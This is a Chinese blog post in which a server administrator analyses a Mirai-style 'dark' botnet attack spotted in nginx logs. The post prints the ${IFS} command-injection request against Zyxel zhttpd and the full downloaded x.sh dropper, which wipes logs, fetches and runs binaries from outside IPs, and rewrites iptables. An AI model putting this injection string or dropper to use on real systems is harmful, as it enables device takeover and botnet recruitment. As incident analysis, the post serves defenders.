dark.x86病毒新变种

最新推荐文章于 2023-09-24 15:47:23 发布
最新推荐文章于 2023-09-24 15:47:23 发布
阅读量2k 收藏
点赞数 1
文章标签: dark Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsls200808/article/details/129430123
版权

病毒行为类似https://www.cnblogs.com/wangbingbing/p/15319257.html

依然是来自俄罗斯莫斯科的病毒。旧病毒换了个伪装程序

查服务器nginx日志发现一个异常请求

170.254.229.130 - - [09/Mar/2023:07:19:08 +0800] "GET /bin/zhttpd/${IFS}cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://163.123.143.126/x.sh;${IFS}sh${IFS}x.sh;" 400 0 "-" "-" "-"

从zhttpd看估计猜想可能是下面这三个的越权漏洞

Zyxel 开发的“zhttpd”网络服务器
zimg图床服务器
https://github.com/zuhd/zhttpd

将http://163.123.143.126/x.sh下载下来看内容

rm -rf /tmp
rm -rf /var/log
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://163.123.143.126/bins/dark.x86; curl -O http://195.133.18.119/bins/dark.x86;cat dark.x86 >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://195.133.18.119/bins/dark.mips; curl -O http://195.133.18.119/bins/dark.mips;cat dark.mips >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://195.133.18.119/bins/dark.mpsl; curl -O http://195.133.18.119/bins/dark.mpsl;cat dark.mpsl >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://195.133.18.119/bins/dark.arm4; curl -O http://195.133.18.119/bins/dark.arm4;cat dark.arm4 >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://195.133.18.119/bins/dark.arm5; curl -O http://195.133.18.119/bins/dark.arm5;cat dark.arm5 >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://195.133.18.119/bins/dark.arm6; curl -O http://195.133.18.119/bins/dark.arm6;cat dark.arm6 >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://195.133.18.119/bins/dark.arm7; curl -O http://195.133.18.119/bins/dark.arm7;cat dark.arm7 >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://195.133.18.119/bins/dark.ppc; curl -O http://195.133.18.119/bins/dark.ppc;cat dark.ppc >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://195.133.18.119/bins/dark.m68k; curl -O http://195.133.18.119/bins/dark.m68k;cat dark.m68k >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://195.133.18.119/bins/dark.sh4; curl -O http://195.133.18.119/bins/dark.sh4;cat dark.sh4 >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
wget http://195.133.18.119/bins/dark.86_64; curl -O http://195.133.18.119/bins/dark.86_64;cat dark.86_64 >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
iptables -F
iptables -A INPUT -p tcp --dport 22 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 2323 -j DROP
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp --dport 8080 -j DROP
iptables -A INPUT -p tcp --dport 9000 -j DROP
iptables -A INPUT -p tcp --dport 8089 -j DROP
iptables -A INPUT -p tcp --dport 7070 -j DROP
iptables -A INPUT -p tcp --dport 8081 -j DROP
iptables -A INPUT -p tcp --dport 9090 -j DROP
iptables -A INPUT -p tcp --dport 161 -j DROP
iptables -A INPUT -p tcp --dport 5555 -j DROP
iptables -A INPUT -p tcp --dport 9600 -j DROP
iptables -A INPUT -p tcp --dport 21412 -j DROP
iptables -A INPUT -p tcp --dport 5986 -j DROP
iptables -A INPUT -p tcp --dport 5985 -j DROP 
iptables -A INPUT -p tcp --dport 17998 -j DROP 
iptables -A INPUT -p tcp --dport 7547 -j DROP 
iptables-save

上一篇博文是伪装成nginx服务,这篇是伪装zyxlel的服务,那么这个漏洞利用的是Zyxel 开发的“zhttpd”网络服务器漏洞没跑了

查一下这个x.sh文件有没有人提交过。

https://www.virscan.org/report/945196525c4b0a14709f68b2751811d3991265c22d5018b5941207414f95985d

这个脚本在去年12月有人提交过了,国产杀毒360引擎检出了。

再下载dark.x86放到引擎里分析

腾讯哈勃

https://habo.qq.com/file/showdetail?md5=7e06e01092956545741ec61d4a7dbf32

virscan

https://www.virscan.org/report/99823157d4749a98be58309ea5776e35c3caed4a672bcd841e7c4e6aa1cb8f2b

gsls200808
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zhttpd服务器
05-23
zhttpd源代码+文档+测试案例。 支持cgi、脚本。 欢迎分享和互相学习。
wget 帮助信息
didostream的专栏
02-21 1028
GNU Wget 1.9+cvs-stable (Red Hat modified),非交互式的网络文件下载工具。用法: wget [选项]... [URL]...长选项必须用的参数在使用短选项时也是必须的。启动:-V, --version 显示 Wget 的版本并且退出。-h, --help 打印此帮助。-b, -background 启动后进入后台操作。-e, -execute=COMMAND
linux下http服务器设计,linux下http服务器设计与实现
weixin_30988079的博客
04-30 458
From:http://blog.csdn.net/linxinze520/article/details/7594603#t10一、zhttpd功能说明1、Linux下的http服务器zhttpd,支持功能:(1)支持多个并发用户访问(2)使用配置文件配置根目录等选项。(3)支持CGI;(4)支持简单的脚本;(5)支持日志系统(log_zhttpd_*文件)。2、其中脚本支持语法为:(1)以开始...
web安全之命令执行(六)
Delity的博客
07-08 3678
一、命令执行漏洞介绍 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限,可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行,更常见的命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等 二、PHP与命令执行漏洞相关的函数: 1、PHP的5种命令执行函数:system()、exec()、passthru()、shell_exec()、“运算符 eval()函数注入攻击,将
Dark.Intervals.Guitars.In.Space.KONTAKT-DECiBEL.rar
06-20
Dark.Intervals.Guitars.In.Space.KONTAKT-DECiBE 解压密码:123 安装说明:https://blog.csdn.net/hongfu951/article/details/118517942 影视配乐吉他音源
dark.reader.chrome.rar
09-24
标题中的"dark.reader.chrome.rar"表明这是一个针对Chrome浏览器的扩展程序压缩包,名为"Dark Reader"。Dark Reader是一款广受欢迎的浏览器插件,它能够将网页转换为暗色模式,帮助用户在光线较暗的环境下浏览网页时...
Indefinable.Audio.Dark.Energy.rar
06-20
Indefinable.Audio.Dark.Energy.rar 解压密码123 安装说明:https://blog.csdn.net/hongfu951/article/details/118517942 Dark Energy是Spectrasonics Omnisphere 2的科幻补丁库,可帮助您将音乐传输到其他世界。 该...
new_Dark.vssettings
04-21
修复了C# 在 VS2019 上的Dark主题下颜色缺失的问题
onedark.vim:一种深色的VimNeovim配色方案,其灵感来自于Atom的One Dark语法主题
02-01
颜色参考安装使用您选择的Vim插件管理器安装主题(或通过将colors/onedark.vim放在~/.vim/colors/目录中和autoload/onedark.vim放在~/.vim/autoload/目录中来手动安装主题。 ) 该主题还支持作为Vim 8软件包安装。 ...
Linux命令大全
hscoder的博客
03-05 7523
一、文件/文件夹管理 ls 列出当前目录文件(不包括隐含文件) ls -a 列出当前目录文件(包括隐含文件) ls -l 列出当前目录下文件的详细信息 cd .. 回当前目录的上一级目录 cd - 回上一次所在的目录 cd ~ 或 cd 回当前用户的宿主目录 mkdir 目录名 创建一个目录 rmdir 空目录名 删除一个空目录 rm 文件名 文件名 删除一个文件或多个文
【网络安全---Linux命令绕过】Linux下命令执行绕过技巧(很全,很实用)
m0_67844671的博客
09-24 2266
Linux下命令执行绕过方式和思路;网站上可能有一些能执行系统命令的地方,但是对一些关键字和空格等做了一些防护,如何绕过就成了一个难题,这篇文章分享一些Linux下的命令执行绕过技巧以及思路,不如说空格的绕过,关键字绕过,编码绕过等等;
ZSH使用$IFS变量报错现象
qq_15042405的博客
01-21 496
使用${IFS}变量时,提示 zsh: no such file or directory
Mirai 僵尸网络变体向 RCE、DDoS 开放 Tenda、Zyxel Gear
热门推荐
网络研究观
06-07 1万+
Mirai 僵尸网络的一个变体利用四种不同的设备漏洞将流行的基于 Linux 的服务器和物联网 (IoT) 设备添加到可以进行基于网络的攻击(包括分布式拒绝服务 (DDoS) 攻击)的僵尸网络中。
服务器中病毒解决思路
又逢乱世
12-13 2214
1,查看有没有增的陌生用户 vim /etc/passwd 发现了一个陌生用户 lsb 现在删除这个用户 userdel -r -f lsb 发现删除不了,查看/etc/passwd文件的权限 发现了这个文件被加了隐藏权限 ----ia-------e-- 就是加了隐藏权限,我们需要去除隐藏权限 查看隐藏权限: lsattr /etc/passwd 删除隐藏权限: chattr -i/etc/passwd chattr -a/etc/passwd ...
数据分析的核心技能和方法
07-19
数据分析的核心技能和方法
毕业设计javajsp人寿保险销售网站(ssh)-qkrp源码含文档工具包
07-19
毕业设计javajsp人寿保险销售网站(ssh)-qkrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 平湖人寿保险公司保险销售网站分为用户和管理员两个部分 前台部分(用户界面): 1、资讯浏览功能: (1)闻资讯浏览 (2)闻资讯查询 (3)公司简介 (4)通知公告 2、用户登录注册功能: (1)注册 (2)登录 3、用户管理功能 (1)个人信息管理 (2)订单管理 4、保险购买功能: (1)保险产品浏览 (2)保险产品查询 (3)保险产品购买 后台管理(管理员界面) 1、管理员登录功能: 管理员在管理员登录界面输入用户名和密码,即可登录管理员的界面。 2、资讯管理功能: (1)闻资讯管理 (2)公司简介管理 (3)通知公告管理 3、保险产品管理: (1)保险产品信息管理 (2)保险产品查询 4、会员管理: (1)会员删除 (2)会员级别管理 5、统计管理: (1)保险产品销售量统计 (2)有效会员数量统计 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程
毕业设计javajsp公共课考试系统(ssh)-qlkrp源码工具包
最新发布
07-19
毕业设计javajsp公共课考试系统(ssh)-qlkrp源码工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 题库 试卷信息管理 阅卷 统计功能 包含:源码、数据库脚本、环境工具包、相同框架项目的安装教程(在说明文档中)
揭秘黑箱:YOLO预测结果的可解释性探究
07-19
YOLO(You Only Look Once)是一种流行的实时对象检测系统,最初由 Joseph Redmon 等人在 2015 年提出。它的核心思想是将对象检测任务视为一个回归问题,直接从图像像素到边界框坐标和类别概率的映射。YOLO 以其快速和高效而闻名,特别适合需要实时处理的应用场景。 以下是 YOLO 的一些关键特点: 1. **单次检测**:YOLO 模型在单次前向传播中同时预测多个对象的边界框和类别概率,不需要多次扫描图像。 2. **速度快**:YOLO 非常快速,能够在视频帧率下进行实时检测,适合移动设备和嵌入式系统。 3. **端到端训练**:YOLO 模型可以从原始图像直接训练到最终的检测结果,无需复杂的后处理步骤。 4. **易于集成**:YOLO 模型结构简单,易于与其他视觉任务(如图像分割、关键点检测等)结合使用。 5. **多尺度预测**:YOLO 可以通过多尺度预测来检测不同大小的对象,提高了检测的准确性。 YOLO 已经发展出多个版本,包括 YOLOv1、YOLOv2(也称为 YOLO9000)、YOLOv3、YOLOv4 和 YOLOv5 等。
dark.reshape举例
05-13
假设我们有一个形状为 (2, 3, 4) 的三维张量 `x`,现在我们想改变它的形状为 (3, 8) 的二维张量,可以使用 `reshape` 函数来实现: ```python import numpy as np x = np.arange(24).reshape((2, 3, 4)) print(x) # 输出: # [[[ 0 1 2 3] # [ 4 5 6 7] # [ 8 9 10 11]] # # [[12 13 14 15] # [16 17 18 19] # [20 21 22 23]]] y = x.reshape((3, 8)) print(y) # 输出: # [[ 0 1 2 3 4 5 6 7] # [ 8 9 10 11 12 13 14 15] # [16 17 18 19 20 21 22 23]] ``` 在上面的例子中,`x` 是一个形状为 (2, 3, 4) 的三维张量,我们使用 `reshape` 函数将其变形为了一个形状为 (3, 8) 的二维张量 `y`。需要注意的是,变形前后张量中元素的数量必须保持不变,否则会抛出异常。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值